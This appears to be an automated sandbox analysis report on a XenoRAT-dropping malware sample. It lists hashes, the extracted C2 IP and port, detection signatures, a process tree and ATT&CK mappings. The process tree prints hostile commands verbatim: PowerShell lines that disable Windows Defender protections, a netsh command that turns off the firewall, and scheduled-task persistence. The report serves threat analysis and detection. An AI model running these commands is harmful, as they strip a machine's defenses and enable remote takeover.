Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
18-05-2024 08:41
Static task
static1
Behavioral task
behavioral1
Sample
2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe
Resource
win7-20240508-en
General
-
Target
2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe
-
Size
5.1MB
-
MD5
7a072413981fe91978c58ae13cda3766
-
SHA1
a3860a84d97d1e5a754c61a7e86d2815003ca7b9
-
SHA256
2b83224eb8a3b749f36c78780d727898233e371572269af2d0853c63d470cfee
-
SHA512
328eed10f0c4f47fdfbfcad00b66fd972590fabe42569e4d0c7f7d4f3f9dd5923954225503fee442f72a0f10285f293d6119f8bf341736b8fff37f7a29568e0a
-
SSDEEP
49152:HcIa7C33IJszhP0o/eiY9iCl3miEcUD9HTxTju5EFhoRvE9Zzy:8a33IGNPaiCUu0duEFSRx
Malware Config
Extracted
xenorat
69.46.15.141
Xeno_rat_nd8912d
-
delay
5000
-
install_path
appdata
-
port
4444
-
startup_name
nothingset
Signatures
-
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
resource yara_rule behavioral2/memory/5292-92-0x0000000006540000-0x000000000663A000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables manipulated with Fody 1 IoCs
resource yara_rule behavioral2/memory/5292-92-0x0000000006540000-0x000000000663A000-memory.dmp INDICATOR_EXE_Packed_Fody -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4076 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5172 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation 3886209194.exe -
Executes dropped EXE 2 IoCs
pid Process 5500 3886209194.exe 5292 3886209194.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 752 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4076 powershell.exe 4076 powershell.exe 5912 powershell.exe 5912 powershell.exe 3480 powershell.exe 3480 powershell.exe 5220 powershell.exe 5220 powershell.exe 3740 powershell.exe 3740 powershell.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe 5292 3886209194.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 5912 powershell.exe Token: SeDebugPrivilege 3480 powershell.exe Token: SeDebugPrivilege 5220 powershell.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeDebugPrivilege 5292 3886209194.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5292 3886209194.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4524 wrote to memory of 4076 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 83 PID 4524 wrote to memory of 4076 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 83 PID 4524 wrote to memory of 5912 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 85 PID 4524 wrote to memory of 5912 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 85 PID 4524 wrote to memory of 3480 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 87 PID 4524 wrote to memory of 3480 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 87 PID 4524 wrote to memory of 5220 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 89 PID 4524 wrote to memory of 5220 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 89 PID 4524 wrote to memory of 3740 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 90 PID 4524 wrote to memory of 3740 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 90 PID 4524 wrote to memory of 5108 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 91 PID 4524 wrote to memory of 5108 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 91 PID 5108 wrote to memory of 5172 5108 cmd.exe 92 PID 5108 wrote to memory of 5172 5108 cmd.exe 92 PID 4524 wrote to memory of 5024 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 93 PID 4524 wrote to memory of 5024 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 93 PID 4524 wrote to memory of 5500 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 102 PID 4524 wrote to memory of 5500 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 102 PID 4524 wrote to memory of 5500 4524 2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe 102 PID 5500 wrote to memory of 5292 5500 3886209194.exe 103 PID 5500 wrote to memory of 5292 5500 3886209194.exe 103 PID 5500 wrote to memory of 5292 5500 3886209194.exe 103 PID 5292 wrote to memory of 752 5292 3886209194.exe 106 PID 5292 wrote to memory of 752 5292 3886209194.exe 106 PID 5292 wrote to memory of 752 5292 3886209194.exe 106 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5024 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension C:\Users\Admin\AppData\Local\Temp\*.exe2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -PUAProtection 02⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740
-
-
C:\Windows\system32\cmd.execmd /C netsh advfirewall set allprofiles state off2⤵
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:5172
-
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-05-18_7a072413981fe91978c58ae13cda3766_ngrbot_snatch.exe2⤵
- Views/modifies file attributes
PID:5024
-
-
C:\Users\Admin\AppData\Local\Temp\3886209194.exeC:\Users\Admin\AppData\Local\Temp\3886209194.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5500 -
C:\Users\Admin\AppData\Roaming\XenoManager\3886209194.exe"C:\Users\Admin\AppData\Roaming\XenoManager\3886209194.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5292 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "XenoUpdateManager" /XML "C:\Users\Admin\AppData\Local\Temp\tmp784D.tmp" /F4⤵
- Creates scheduled task(s)
PID:752
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
Filesize
948B
MD5c65738617888921a153bd9b1ef516ee7
SHA15245e71ea3c181d76320c857b639272ac9e079b1
SHA2564640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
SHA5122e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa
-
Filesize
948B
MD5c1a54dd5a1ab44cc4c4afd42f291c863
SHA1b77043ab3582680fc96192e9d333a6be0ae0f69d
SHA256c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75
SHA512010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d
-
Filesize
69KB
MD56bc7ab284910610872d47f9cf42a8d55
SHA10e774a524c0a4043c7988edef661ff9902fcceef
SHA256aa46487f9722d672ebcbdbd473d175ebe2608b5ac9cea822f33661fc43fa7cfc
SHA51297eb72a54a4a1c98a0338b77e12d9101bdf2b717ef345f9fe9c2e67066b94cbea48ede706a8995900fbd0e9ca42f27f7e2bbb676c6fbd427e9e9c6a01f152915
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD584453390984eaaae54c58bd900b714d8
SHA14463bc46557f700335fa245f76ce0b58abc65a25
SHA25644d1a263d002d35545c1be91fc51f9d97d869bd508a02d44f5e13ba5df339443
SHA512c51b3af815827c33ad8e02fd5e08276dc7c6bc653559ba09412fdae8470271328092b833bc14794d189cfeef30b2d54c64a844afb1e5cd73c0cf70cf287cec24